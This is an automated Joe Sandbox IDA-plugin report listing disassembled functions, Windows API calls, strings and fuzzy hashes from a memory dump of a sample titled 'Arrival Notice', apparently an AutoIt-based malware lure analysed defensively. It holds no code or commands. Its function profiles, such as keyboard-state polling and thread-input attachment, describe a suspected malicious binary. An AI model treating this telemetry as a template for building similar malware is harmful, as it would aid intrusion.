Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
API String ID: 2907320926-3566645568
Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A

Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091

DestroyAcceleratorTable.USER32(?), ref: 0047094A
ImageList_Destroy.COMCTL32(?), ref: 004709AD
ImageList_Destroy.COMCTL32(?), ref: 004709C5
ImageList_Destroy.COMCTL32(?), ref: 004709D5
DeleteObject.GDI32(00000000), ref: 00470A04
DestroyIcon.USER32(02FA00C0), ref: 00470A1C
DeleteObject.GDI32(F8E5DE8F), ref: 00470A34
DestroyWindow.USER32(00720066), ref: 00470A4C
DestroyIcon.USER32(?), ref: 00470A73
DestroyIcon.USER32(?), ref: 00470A81
KillTimer.USER32(00000000,00000000), ref: 00470B00

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
String ID:
API String ID: 1237572874-0
Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58

Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
VariantInit.OLEAUT32(?), ref: 004793E1
SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
VariantCopy.OLEAUT32(?,?), ref: 00479461
SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
VariantClear.OLEAUT32(?), ref: 00479489
SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
VariantClear.OLEAUT32(?), ref: 004794CA
SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4

Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0044480E
GetAsyncKeyState.USER32(000000A0), ref: 00444899
GetKeyState.USER32(000000A0), ref: 004448AA
GetAsyncKeyState.USER32(000000A1), ref: 004448C8
GetKeyState.USER32(000000A1), ref: 004448D9
GetAsyncKeyState.USER32(00000011), ref: 004448F5
GetKeyState.USER32(00000011), ref: 00444903
GetAsyncKeyState.USER32(00000012), ref: 0044491F
GetKeyState.USER32(00000012), ref: 0044492D
GetAsyncKeyState.USER32(0000005B), ref: 00444949
GetKeyState.USER32(0000005B), ref: 00444958

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9

Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00470BC6

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_wcscpy.LIBCMT ref: 00470BEA
VariantInit.OLEAUT32(?), ref: 00470C4C
VariantInit.OLEAUT32(?), ref: 00470C5A
VariantInit.OLEAUT32(?), ref: 00470C60
VariantInit.OLEAUT32(?), ref: 00470C69
VariantInit.OLEAUT32(?), ref: 00470C72
VariantInit.OLEAUT32(?), ref: 00470C80
VariantInit.OLEAUT32(?), ref: 00470C89
VariantInit.OLEAUT32(?), ref: 00470C9A
VariantInit.OLEAUT32 ref: 00470CB5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: InitVariant$_malloc_wcscpy_wcslen
String ID:
API String ID: 3413494760-0
Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5

Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000001,?), ref: 004543C6
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 004543DF
_malloc.LIBCMT ref: 0045441D
_strlen.LIBCMT ref: 0045447B
_malloc.LIBCMT ref: 00454485
_strcat.LIBCMT ref: 00454496
_free.LIBCMT ref: 004545DB
_free.LIBCMT ref: 004545ED

Strings

AU3_FreeVar, xrefs: 004543D9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressProc_free_malloc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 2634073740-771828931
Opcode ID: 84f17276bf83cca5f38a906fa5b9d5cf91bf64f5b6f12b10d2c34b05558e006b
Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
Opcode Fuzzy Hash: 84f17276bf83cca5f38a906fa5b9d5cf91bf64f5b6f12b10d2c34b05558e006b
Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94

Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 0046C63A
CoUninitialize.OLE32 ref: 0046C645

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4

CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
IIDFromString.OLE32(?,?), ref: 0046C705

Strings

Invalid parameter, xrefs: 0046C720
NULL Pointer assignment, xrefs: 0046C74A
Failed to create object, xrefs: 0046C78F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 2294789929-1287834457
Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA

Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410

DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
ImageList_EndDrag.COMCTL32 ref: 00471169
ReleaseCapture.USER32 ref: 0047116F
SetWindowTextW.USER32(?,00000000), ref: 00471206
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216

Strings

@GUI_DROPID, xrefs: 00471245
@GUI_DRAGFILE, xrefs: 0047127A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 2483343779-2107944366
Opcode ID: e86c144bec5737ca2d4e246b1ffe3b51c51e8625c1c36adbe63ff8434ef78569
Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
Opcode Fuzzy Hash: e86c144bec5737ca2d4e246b1ffe3b51c51e8625c1c36adbe63ff8434ef78569
Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA

Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
_wcslen.LIBCMT ref: 00450720
_wcscat.LIBCMT ref: 00450733
SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
SendMessageW.USER32(?,00001061,?,?), ref: 0045077E

Strings

-----, xrefs: 0045072B
SysListView32, xrefs: 00450673

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$Window_wcscat_wcslen
String ID: -----$SysListView32
API String ID: 4008455318-3975388722
Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58

Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
GetDlgCtrlID.USER32(00000000), ref: 00469C84
GetParent.USER32 ref: 00469C98
SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
GetDlgCtrlID.USER32(00000000), ref: 00469CA5
GetParent.USER32 ref: 00469CBC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3

Strings

ListBox, xrefs: 00469C31
ComboBox, xrefs: 00469BFF

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove_wcslen
String ID: ComboBox$ListBox
API String ID: 2360848162-1403004172
Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5

Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0045DCAF
SHGetMalloc.SHELL32(?), ref: 0045DCB9
CoUninitialize.OLE32 ref: 0045DCC3
_wcscpy.LIBCMT ref: 0045DD06
SHGetDesktopFolder.SHELL32(00000000,?), ref: 0045DD62
_wcscpy.LIBCMT ref: 0045DD83
_wcscpy.LIBCMT ref: 0045DDE3
SHBrowseForFolderW.SHELL32(?), ref: 0045DE0E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DE30
CoUninitialize.OLE32 ref: 0045DE7E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
String ID:
API String ID: 262282135-0
Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64

Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
GetWindowLongW.USER32(?,000000F0), ref: 004481CF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54

Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B

SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25

Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$BrushCreateDeleteObjectSolid
String ID:
API String ID: 3771399671-0
Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18

Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00434643
GetForegroundWindow.USER32(00000000), ref: 00434655
GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
